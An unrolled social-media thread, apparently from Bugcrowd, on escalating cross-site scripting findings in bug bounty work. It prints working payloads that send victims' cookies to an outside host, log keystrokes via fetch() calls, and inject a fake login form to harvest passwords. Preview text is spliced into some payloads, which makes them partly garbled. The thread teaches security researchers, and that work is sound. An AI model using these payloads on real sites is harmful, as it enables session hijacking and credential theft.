Thread by @Bugcrowd, Here are a few ways to make the most of an XSS. [...]

Here are a few ways to make the most of an XSS. Comment if you can think of some other ideas or resources! Thread

Grab the victim's cookies by redirecting to an attacker's server and appending the cookie value, e.g.
document.location=' https://bugcrowd.com/?'+document.cookie

#1 Crowdsourced Cybersecurity Platform | Bugcrowd

With a powerful cybersecurity platform and team of security researchers, Bugcrowd connects organizations to a global crowd of trusted ethical hackers.

https://bugcrowd.com/?'+document.cookie

Perform a sensitive action as the victim user (such as changing their password or email address). Having an XSS allows you to bypass SOP and Anti-CSRF mechanisms. See here for some payloads + inspiration: https://github.com/hakluke/weaponised-XSS-payloads

hakluke/weaponised-XSS-payloads

XSS payloads designed to turn alert(1) into P1. Contribute to hakluke/weaponised-XSS-payloads development by creating an account on GitHub.

https://github.com/hakluke/weaponised-XSS-payloads

Plant a JavaScript keylogger (from https://github.com/swisskyrepo/PayloadsAllTheThings)
<img src=x onerror='document.onkeypress=function(e){fetch(" http://bugcrowd.com?k=bugcrowd.com/?k= "+String.fromCharCode(e.which))},this.remove();'>

Redress the window with a fake HTML login form to phish credentials:

document.body.innerHTML = "<form action=' https://bugcrowd.com '><input type='text' value='email' name='email'><input type='password' value='password' name='password'><input type='submit'></form>"

#1 Crowdsourced Cybersecurity Platform | Bugcrowd

With a powerful cybersecurity platform and team of security researchers, Bugcrowd connects organizations to a global crowd of trusted ethical hackers.

https://bugcrowd.com

You can follow @Bugcrowd.

Tip: mention @twtextapp on a Twitter thread with the keyword “unroll” to get a link to it.

Latest Threads Unrolled: